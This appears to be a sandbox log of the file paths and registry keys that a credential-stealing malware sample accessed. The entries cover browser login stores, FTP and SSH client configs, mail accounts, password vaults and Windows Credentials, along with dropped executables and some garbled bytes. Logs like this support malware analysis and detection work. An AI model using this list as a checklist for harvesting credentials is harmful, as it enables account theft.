C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\user\AppData\LocalOrbitum\Login Data
C:\Users\user\AppData\LocalOrbitum\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\user\AppData\LocalIridium\Login Data
C:\Users\user\AppData\LocalIridium\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\user\AppData\Roaming\Opera
C:\Users\user\AppData\Roaming\.purple\accounts.xml
C:\Users\user\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\user\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\user\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\user\Documents\NetSarang\Xftp\Sessions
C:\Users\user\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\user\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\user\AppData\Roaming\Cyberduck
C:\Users\user\AppData\Roaming\iterate_GmbH
C:\Users\user\.config\fullsync\profiles.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\user\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\user\AppData\Roaming\wcx_ftp.ini
C:\Users\user\wcx_ftp.ini
C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\user\AppData\Roaming\Ipswitch
C:\Users\user\site.xml
C:\Users\user\AppData\Local\PokerStars*
C:\Users\user\AppData\Local\ExpanDrive
C:\Users\user\AppData\Roaming\Steed\bookmarks.txt
C:\Users\user\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\user\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\user\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\user\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\user\AppData\Roaming\SmartFTP
C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\user\Documents\*.tlp
C:\Users\user\Documents\*.bscp
C:\Users\user\Documents\*.vnc
C:\Users\user\Desktop\*.vnc
C:\Users\user\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\user\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\user\AppData\Roaming\UltraFXP\sites.xml
C:\Users\user\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\user\AppData\Roaming\Pocomail\accounts.ini
C:\Users\user\Documents\Pocomail\accounts.ini
C:\Users\user\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\user\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\user\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\user\Documents\*Mailbox.ini
C:\Users\user\Documents\yMail2\POP3.xml
C:\Users\user\Documents\yMail2\SMTP.xml
C:\Users\user\Documents\yMail2\Accounts.xml
C:\Users\user\Documents\yMail\ymail.ini
C:\Users\user\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\user\Documents\*.spn
C:\Users\user\Desktop\*.spn
C:\Users\user\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\user\AppData\Roaming\stickies\images
C:\Users\user\AppData\Roaming\stickies\rtf
C:\Users\user\AppData\Roaming\NoteFly\notes
C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\user\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\user\Documents
C:\Users\user\Documents\*.kdbx
C:\Users\user\Desktop
C:\Users\user\Desktop\*.kdbx
C:\Users\user\Documents\*.kdb
C:\Users\user\Desktop\*.kdb
C:\Users\user\Documents\Enpass
C:\Users\user\Documents\My RoboForm Data
C:\Users\user\Documents\1Password
C:\Users\user\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\user\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\user\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\user\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\Microsoft\Credentials
C:\Users\user\AppData\Roaming\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Microsoft\Credentials
C:\Users\user\AppData\Local\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\WindowsShell.Manifest
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
\xe8\xab\x90\xc8\x92EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Sysinternals
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x81\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x92\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
